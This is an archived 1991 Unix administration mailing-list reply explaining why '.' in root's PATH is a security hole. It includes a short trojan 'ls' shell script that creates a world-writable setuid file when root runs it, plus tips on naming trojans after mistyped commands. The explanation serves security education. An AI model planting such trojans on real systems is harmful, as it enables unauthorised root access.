Mysterious security hole

Jon Wright jonw at assip.csasyd.oz
Thu Jun 13 09:56:57 AEST 1991


In <91161.131540SCHDAVZ at YaleVM.YCC.Yale.Edu> SCHDAVZ at YaleVM.YCC.Yale.Edu (Dave Schweisguth) writes:

>This probably isn't so mysterious, but the subject line has got to be zippy or
>nobody'll read my post.
> 
>The 'login' command initializes PATH with (among other useful directories)
>'.'. 'su' leaves '.' out. A footnote to a Unix book I have here hints at a
>security hole involving the _position_ of '.' in PATH, claiming that having
>'.' first is dangerous. It doesn't say why.
>     These add up to something screwy with '.'. Can someone explain why root/
>Joe User ought/ought not have '.' in his/her path, and if so should it be
>first, last, or anywhere, and (this is the good part) why? The system is an
>SGI Personal Iris, IRIX v3.3.2, if it matters.
>

Simple......
If ROOT has "." in his/her path, I create a file called "ls" in any directory
that:
	a. I have write permission for, and
	b. root may use....
My ls will do the following:
	#!/bin/sh
	# Runs with the privileges of whoever typed "ls". If that is root,
	# the file below is created owned by root, then made world-writable
	# and setuid/setgid.
	WHO=`whoami`
	FILE=/tmp/...gotcha.${WHO}
	echo > "${FILE}"
	chmod ugo+rwx "${FILE}"
	chmod ug+s "${FILE}"
	# Hand over to the real ls so the victim sees nothing odd.
	/bin/ls "$@"
or something similar (I don't want an argument about the correctness of this
example - the idea is right).

Now I wait patiently and keep checking /tmp; eventually root will try to run ls
in that directory, and bingo, I now have a setuid file that I can modify.

Obviously I need to pick a command that is not built into the shell and also that
appears in the path later than "."

If "." is at the end, then try common misspellings of commands such as "ls-" and
"act" etc.

> 
>This may well be an FAQ (the book certainly seems to think so) but I haven't
>found an FAQ list. If there is one, please let me know. Thanks!
> _____________________________________________________________________________
>/                                                                             \
>|   Dave Schweisguth               5386 Yale Station           203-436-2694   |
>|   schdavz at yalevm.ycc.yale.edu    New Haven, CT 06502-5386                   |
>\_____________________________________________________________________________/

Hope this helps,


		Regards,
			    Jon Gilbert Wright

	Network Manager				Unix Systems Consultant
	Computer Sciences of Australia		Guru Software Services
	jonw at assip.csasyd.oz			gremlin at runxtsa.runx.oz



More information about the Comp.unix.admin mailing list